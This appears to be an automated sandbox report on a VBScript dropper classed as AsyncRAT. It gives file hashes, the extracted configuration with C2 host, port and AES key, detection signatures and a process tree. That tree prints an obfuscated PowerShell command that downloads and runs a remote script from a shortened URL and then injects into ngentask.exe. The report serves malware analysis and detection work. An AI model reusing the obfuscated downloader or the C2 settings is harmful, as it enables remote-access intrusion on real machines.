Analysis
- max time kernel: 128s
- max time network: 159s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 27-07-2021 15:25
- Static task: static1
- Behavioral task: behavioral1
- Sample: LKGFCV.vbs.vbs
- Resource: win7v20210408
General
- Target: LKGFCV.vbs.vbs
- Size: 730B
- MD5: 8a7246cc77596aa840c15b3ac9907c4e
- SHA1: c34f30b5aa3777cf3b3d35cfd8af330f8af97981
- SHA256: c7be7d6e94c31e0f376d1cb9be3e0f311d57ae1a318437dc7c28b2574a73be31
- SHA512: 790e62a08b098dcdda4dfc1cc218712f069426b639420aca7ae6dfbd239f765fe379b92847d12da8a8f68699068d1779e7415d1c76fa64a989ae9dfa8b7dbe94
Malware Config
Extracted
- Family: asyncrat
- Version: 0.5.7B
- C2: newfrost.ddns.net:6666
- Mutex: AsyncMutex_6SI8OkPnk
Attributes:
- aes_key: iQqiAD9kmzPLel2oEjZjj8tYKfnH5XkL
- anti_detection: false
- autorun: false
- bdos: false
- delay: new
- host: newfrost.ddns.net
- hwid: 3
- install_file:
- install_folder: %AppData%
- mutex: AsyncMutex_6SI8OkPnk
- pastebin_config: null
- port: 6666
- version: 0.5.7B
Signatures
- suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
- Async RAT payload (3 IoCs)
  resource / yara_rule:
  behavioral2/memory/2084-358-0x0000000000400000-0x0000000000412000-memory.dmp / asyncrat
  behavioral2/memory/2084-359-0x000000000040C73E-mapping.dmp / asyncrat
  behavioral2/memory/2084-382-0x0000000000D00000-0x0000000000D20000-memory.dmp / asyncrat
- Blocklisted process makes network request (4 IoCs)
  Processes: powershell.exe
  flow / pid / process:
  9 / 1696 / powershell.exe
  11 / 1696 / powershell.exe
  19 / 1696 / powershell.exe
  20 / 1696 / powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.exe
  description / pid / process / target process:
  PID 412 set thread context of 2084 / 412 / powershell.exe / ngentask.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes: powershell.exe, powershell.exe
  pid / process:
  1696 / powershell.exe
  1696 / powershell.exe
  1696 / powershell.exe
  412 / powershell.exe
  412 / powershell.exe
  412 / powershell.exe
  412 / powershell.exe
  412 / powershell.exe
  412 / powershell.exe
  412 / powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: powershell.exe, powershell.exe, ngentask.exe
  description / pid / process:
  Token: SeDebugPrivilege / 1696 / powershell.exe
  Token: SeDebugPrivilege / 412 / powershell.exe
  Token: SeDebugPrivilege / 2084 / ngentask.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes: WScript.exe, powershell.exe, powershell.exe
  description / pid / process / target process:
  PID 2256 wrote to memory of 1696 / 2256 / WScript.exe / powershell.exe
  PID 2256 wrote to memory of 1696 / 2256 / WScript.exe / powershell.exe
  PID 1696 wrote to memory of 412 / 1696 / powershell.exe / powershell.exe
  PID 1696 wrote to memory of 412 / 1696 / powershell.exe / powershell.exe
  PID 412 wrote to memory of 1852 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 1852 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 1852 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 1396 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 1396 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 1396 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 2084 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 2084 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 2084 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 2084 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 2084 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 2084 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 2084 / 412 / powershell.exe / ngentask.exe
  PID 412 wrote to memory of 2084 / 412 / powershell.exe / ngentask.exe
Processes
- C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LKGFCV.vbs.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3BMLFhm'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps1
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe (depth 4)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe (depth 4)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe (depth 4)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
        - Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Public\ToT.ps1
  MD5: 1553ebbcd9e6ba4ac17862506e0869cd
  SHA1: 2202ca18a46e81c3d4f8e021b69c77b8368eb580
  SHA256: ed0135626c359fa8bab49ea7481e20b5062d1f613c65b039cf42ae27ead0437d
  SHA512: 5913d4b247970046febf38e18c614528bb6f9552cef4a2b1b34ef70a6831c84c9a0409217b221b3bf4adc0e0eb7083914bbd9e9d65d0b59b0104604b1fdaa238